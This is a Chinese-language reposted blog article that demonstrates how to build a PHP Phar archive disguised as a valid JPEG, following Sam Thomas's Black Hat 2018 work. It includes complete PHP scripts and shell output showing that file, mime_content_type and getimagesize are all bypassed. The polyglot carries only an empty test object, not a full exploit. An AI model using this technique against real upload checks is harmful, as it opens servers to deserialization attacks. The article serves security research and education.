攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)

程序员文章站 2023-03-30 15:24:26

在us blackhat 2018大会上，安全人员证明，攻击者不仅可以利用phar包发动rce攻击，而且，通过调整其二进制内容，他们还可以将其伪装成一幅图像，从而绕过安全检...

在us blackhat 2018大会上，安全人员证明，攻击者不仅可以利用phar包发动rce攻击，而且，通过调整其二进制内容，他们还可以将其伪装成一幅图像，从而绕过安全检查。

在本文中，我们来看看第二点是如何做到的。

背景知识

在us blackhat 2018大会期间，sam thomas召开了一个关于在php中利用 phar:// 流包装器来实现针对服务器的代码执行攻击的研讨会（幻灯片）。

在运行phar包时，由于php会对其内容进行反序列化，从而允许攻击者启动一个php对象包含链。其中，最有趣的部分在于如何触发有效载荷：归档上的任何文件操作都将执行它。最后，攻击者根本无需关心文件名是否正确，因为即使是失败的文件调用，php也会对其内容进行反序列化处理。

此外，攻击者完全可以将phar包伪装成一幅图像：在这篇文章中，我们将为读者解释他们是如何做到这一点的。

降至字节码级别

有时我们会忘记这一点，那就是在机器眼里，文件只不过是一堆遵循预定义结构的字节而已。对于应用程序而言，将检查自己是否可以管理这样的数据流，如果可以的话，就会生成相应的输出。

在thomas的演讲中，曾提示如何创建具有有效jpeg头部的phar包。

攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)

图片引自sam thomas的幻灯片

不过，这里我们要做的是创建一个具有jpeg头部的文件，并更新phar的校验和。这样一来，phar包一方面会被视为一个图像，同时，php还可以继续执行它。

开始下手

听起来，这里只需修改几个字节并更新校验，按说应该非常轻松，对吧？

然而，事实并非如此。

计算校验和（至少对我来说）是一件让人头痛的事情。所以，我想：如果让php来代劳的话，会怎样呢？

所以，我对thomas的原始剧本进行了一番改造，具体如下所示：

<?php
class testobject {}
$phar = new phar("phar.phar");
$phar->startbuffering();
$phar->addfromstring("test.txt","test");
$phar->setstub("\xff\xd8\xff\xfe\x13\xfa\x78\x74 __halt_compiler(); ?>");
$o = new testobject();
$phar->setmetadata($o);
$phar->stopbuffering();

如您所见，这里将原始hex字节添加到了phar存档的存根部分。下面是原始hex得到的结果：

tampe125@alphacentauri:~$ xxd phar.jpeg 
00000000: ffd8 fffe 13fa 7874 205f 5f48 414c 545f ......xt __halt_
00000010: 434f 4d50 494c 4552 2829 3b20 3f3e 0d0a compiler(); ?>..
00000020: 4c00 0000 0100 0000 1100 0000 0100 0000 l...............
00000030: 0000 1600 0000 4f3a 3130 3a22 5465 7374 ......o:10:"test
00000040: 4f62 6a65 6374 223a 303a 7b7d 0800 0000 object":0:{}....
00000050: 7465 7374 2e74 7874 0400 0000 177e 7a5b test.txt.....~z[
00000060: 0400 0000 0c7e 7fd8 b601 0000 0000 0000 .....~..........
00000070: 7465 7374 6f9e d6c6 7d3f ffaa 7bc8 35ea testo...}?..{.5.
00000080: bfb5 ecb8 7294 2692 0200 0000 4742 4d42 ....r.&.....gbmb

这同时是一个合法的phar包，以及一幅合法的jpeg图像吗？

tampe125@alphacentauri:~$ file phar.jpeg 
phar.jpeg: jpeg image data
tampe125@alphacentauri:~$ php -a
php > var_dump(mime_content_type('phar.jpeg'));
php shell code:1:
string(10) "image/jpeg"
php > var_dump(file_exists('phar://phar.jpeg/test.txt'));
php shell code:1:
bool(true)

看到了吧，php将其视为一幅图像，我们仍然可以探索存档的内容。哈哈，好玩吧！

注意：请仔细查看存根部分，看看它是如何“跳过”开头部分的php标记的。因为这里是绕过大多数内容扫描程序的关键所在。对于存档来说，是否有效的关键在于函数 __halt_compiler() ；我认为，php会通过它来确定出应该“跳过”多少数据。

更进一步

到目前为止，我们制作的文件已经可以通过任何基于文件头的类型检测了，但是，对于更高级的检测方法来说，它就无能为力了。例如，使用 getimagesize 来检查文件内容是否为图像的话，将返回false，因为它并不是一幅“真正”的图像：

tampe125@alphacentauri:~$ php -a
php > var_dump(getimagesize('phar.jpeg'));
php shell code:1:
bool(false)

看到了吧。

但是，别忘了，我们可以在 __halt_compiler() 标记之前填充任意的数据的，所以，如果我们在此填入一幅完整的图像的话，会怎样呢？于是，我花了大量的时间去研读 jpeg规范和 php源代码，不过最后仍然没有理出头绪，所以，我果断决定放弃——太复杂了。

那么，能否直接使用gimp创建10x10黑色图像并嵌入其中呢？

<?php
class testobject {}
$jpeg_header_size = 
"\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
"\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
"\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
"\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
"\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
"\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
"\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
"\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
"\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
$phar = new phar("phar.phar");
$phar->startbuffering();
$phar->addfromstring("test.txt","test");
$phar->setstub($jpeg_header_size." __halt_compiler(); ?>");
$o = new testobject();
$phar->setmetadata($o);
$phar->stopbuffering();

好了，看看效果如何：

tampe125@alphacentauri:~$ file phar.jpeg 
phar.jpeg: jpeg image data, jfif standard 1.01, resolution (dpi), density 72x72, segment length 16, comment: "created with gimp", progressive, precision 8, 10x10, frames 3
tampe125@alphacentauri:~$ php -a
php > var_dump(mime_content_type('phar.jpeg'));
php shell code:1:
string(10) "image/jpeg"
php > var_dump(file_exists('phar://phar.jpeg/test.txt'));
php shell code:1:
bool(true)
php > var_dump(getimagesize('phar.jpeg'));
php shell code:1:
array(7) {
 [0] =>
 int(10)
 [1] =>
 int(10)
 [2] =>
 int(2)
 [3] =>
 string(22) "width="10" height="10""
 'bits' =>
 int(8)
 'channels' =>
 int(3)
 'mime' =>
 string(10) "image/jpeg"
}

这次，我们如愿以偿了。这个文件不仅是一个包含我们想要利用的类的phar包，同时，它还是一幅合法的图像（我们甚至可以用系统图像查看器打开它）：

攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)

小结

正如我们刚才看到的，文件实际上只是一堆字节而已：如果我们只是利用其元数据进行类型检测的话，那么很可能会出错：攻击者可以轻松绕过检测，并返回他们想要的文件类型。要想检测文件类型，更加可靠的解决方案是直接读取文件内容并搜索恶意字符串。

上一篇： AMD砍掉线程撕裂者普通人用64核毫无意义

下一篇：德妃是怎么从奉茶宫女走到四妃之一的？一点都不简单